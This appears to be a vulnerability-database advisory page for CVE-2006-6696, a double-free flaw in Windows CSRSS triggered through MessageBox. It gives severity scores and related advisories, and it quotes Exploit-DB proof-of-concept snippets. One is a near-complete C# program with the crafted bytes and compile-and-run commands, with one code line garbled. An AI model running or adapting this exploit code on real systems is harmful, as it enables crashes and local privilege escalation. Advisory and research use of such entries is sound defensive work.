CVE-2006-6696
Published 2006-12-22
CVE-2006-6696: Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a…
Priority P4 · 30 · medium · 6.9 CVSS 2.0
AV:L/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 3.28% (86.9th percentile)
Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a MB_SERVICE_NOTIFICATION message with crafted data, which sends a HardError message to Client/Server Runtime Server Subsystem (CSRSS) process, which is not properly handled when invoking the UserHardError and GetHardErrorText functions in WINSRV.DLL.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
GHSA
GHSA-fmp2-4wcx-jwx4: Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with
ghsa_unreviewed·2022-05-01
CVE-2006-6696 [MEDIUM] CWE-119 GHSA-fmp2-4wcx-jwx4: Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with
GHSA
GHSA-jgq8-8q6h-fqgv: The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory fro
ghsa_unreviewed·2022-05-01·CVSS 6.9
CVE-2006-6797 [MEDIUM] GHSA-jgq8-8q6h-fqgv: The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory fro
The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory from csrss.exe via crafted arguments to the NtRaiseHardError function with status 0x50000018, a different vulnerability than CVE-2006-6696.
No detection rules found.
Exploit-DB
Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure
exploitdb·2006-12-27
CVE-2006-6696 Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure
---
/////////////////////////////////////////
/////////////////////////////////////////
///// Microsoft Windows NtRaiseHardError
///// Csrss.exe memory disclosure
/////////////////////////////////////////
///// Ruben Santamarta
///// ruben at reversemode dot com
///// www.reversemode.com
/////////////////////////////////////////
///// 12.27.2006
///// For educational purposes ONLY
///// Compiled using gcc (Dev-C++)
////////////////////////////////////////
#include
#include
#include
#include
#define UNICODE
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_SUCCESS ((NTSTATUS) 0x00000000)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004)
#define STATUS_INVALID_PARAMETER ((NTSTATUS) 0xC000000D)
Exploit-DB
Microsoft Windows - 'MessageBox' Memory Corruption Local Denial of Service
exploitdb·2006-12-20
CVE-2006-6696 Microsoft Windows - 'MessageBox' Memory Corruption Local Denial of Service
---
// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
{
[DllImport("user32.dll")]
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);
static unsafe void Main()
{
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
{
for(int i=0; i> csc /unsafe mbox.cs
// >> mbox.exe
// milw0rm.com [2006-12-20]
No writeups or analysis indexed.
Published: 2006-12-22